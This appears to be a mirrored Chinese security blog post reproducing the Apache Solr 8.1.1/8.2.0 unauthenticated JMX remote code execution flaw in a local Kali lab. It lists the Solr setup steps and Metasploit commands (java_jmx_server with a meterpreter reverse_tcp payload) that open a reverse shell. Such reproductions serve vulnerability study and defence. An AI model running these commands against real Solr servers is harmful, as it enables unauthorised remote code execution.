专栏名称: TimelineSec
安全圈必备公众号之一!专注于最新漏洞复现!内含漏洞时间线工具靶场等干货!记录每一个漏洞,捕捉安全的每一瞬间!
目录
相关文章推荐
深圳发布  ·  送打车优惠券!这波交通福利快来接住! ·  3 天前  
深圳发布  ·  深圳发布 x 荣耀终端,送限量哪吒周边!! ·  3 天前  
深圳大件事  ·  突发!张兰、汪小菲,被无限期封禁! ·  3 天前  
51好读  ›  专栏  ›  TimelineSec

Apache Solr JMX服务 RCE 漏洞复现

TimelineSec  · 公众号  ·  · 2020-02-23 18:00

正文


本公众号专注于最新漏洞复现,欢迎关注!

----------------------------------------------------------------------------------------

本文作者:小阳(Timeline Sec核心成员)

本文共724字,阅读大约需要2~3分钟

声明:请勿做非法用途,否则后果自负


0x00 漏洞概述

Apache Solr的8.1.1和8.2.0版本的自带配置文件solr.in.sh中存在不安全的选项ENABLE_REMOTE_JMX_OPTS="true"。 如果受害者使用了该默认配置,则会在默认端口18983开放JMX服务,且默认未开启认证。 任何可访问此端口的攻击者可利用此漏洞向受影响服务发起攻击,执行任意代码。


0x01 影响版本

Apache Solr8.1.1和8.2.0版本


0x02 漏洞危害

如果受害者使用了该默认配置,则会在默认端口18983开放JMX服务,且默认未开启认证。 任何可访问此端口的攻击者可利用此漏洞向受影响服务发起攻击,执行任意代码。


0x03 复现搭建

Solr 8.20 、Java环境 、kali系统


因为 Solr 8.20 需要java环境支持,而kali系统本身内置openjdk版本(我的是java10),所以我们无需另外下载java环境。


安装 Apache Solr 8.20:

wget https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/8.2.0/solr-8.2.0.zip




解压安装包
unzip solr-8.2.0.zip




切换到bin目录启动Solr

./solr  start  -force




成功访问ip:8983(Solr默认端口)



0x04 漏洞复现

我们可以用MSF中的exploit/multi/misc/java_jmx_server模块进行漏洞复现。 (我是用kali搭建漏洞环境原因,使用127.0.0.1本地地址作为攻击目标)

use exploit/multi/misc/java_jmx_serverset RHOST 127.0.0.1set RPORT 18983






设置payload java/meterpreter/reverse_tcp
set payload java/meterpreter/reverse_tcpset LHOST 127.0.0.1set LPORT  4444




执行完成,发现成功建立连接








请到「今天看啥」查看全文